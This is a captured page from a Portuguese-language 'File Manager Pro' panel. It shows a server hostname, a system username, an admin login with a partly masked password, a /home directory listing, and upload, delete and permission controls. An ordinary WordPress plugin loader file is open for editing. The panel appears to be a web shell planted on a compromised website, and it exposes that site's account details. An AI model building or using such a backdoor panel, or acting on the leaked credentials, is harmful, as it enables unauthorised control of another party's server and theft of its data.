🗂️ File Manager Pro
🖥️ Tipo de Hospedagem:
Vps
📁 Diretório Raiz:
/home
🌐 Servidor:
www.apm-abl.com
👤 Usuário:
apmablcosr
🔐 Sessão:
🔑 Credenciais:
adm_3dd0a769 / ae19****
📍 Localização Atual:
home
Caminho completo: /home
📤 Enviar Arquivo
📁 Nova Pasta
⬆️ Voltar
🏠 Raiz
🗑️ DELETAR
📦 ZIPAR/DEZIPAR
Status
Nome
Tamanho
Modificado
Permissões
Ações
📁 a
-
03/02/2026 22:15
0755
✏️
📁 apmablcosr
-
26/01/2026 16:35
0705
✏️
🗑️
Editando: loader.php
<?php /** * * Load our custom marketing integrations * */ // Exit if accessed directly. if ( !defined( 'ABSPATH' ) ) exit; class EEB_Integrations_Loader{ function __construct(){ $this->load_integrations(); } public function load_integrations(){ $plugins = array( 'avada_builder' => 'avada_builder.php', 'bricks_builder' => 'bricks_builder.php', 'maintenance' => 'maintenance.php', 'divi_theme' => 'divi_theme.php', 'google_site_kit' => 'google_site_kit.php', 'oxygen_builder' => 'oxygen_builder.php', 'the_events_calendar' => 'the_events_calendar.php', 'wpml' => 'wpml.php', ); $services = array( //'foggy_email' => 'foggy_email.php' //Got discontinued ); $integrations = array_merge( $plugins, $services ); foreach ( $integrations as $plugin_id => $plugin_file ) : $plugin_file = 'classes/' . $plugin_file; $full_path = EEB_PLUGIN_DIR . 'core/includes/integrations/' . $plugin_file; if ( TRUE === apply_filters( 'eeb/integrations/' . $plugin_id, true ) ){ if( file_exists( $full_path ) ){ include( $plugin_file ); } } endforeach; } }
💾 Salvar
❌ Cancelar
Enviar Arquivo
Selecionar arquivo:
Enviar
Cancelar
Criar Nova Pasta
Nome da pasta:
Criar
Cancelar
Alterar Permissões
Nova permissão:
0644 (rw-r--r--)
0755 (rwxr-xr-x)
0777 (rwxrwxrwx)
0600 (rw-------)
0700 (rwx------)
0444 (r--r--r--)
💾 Salvar
Cancelar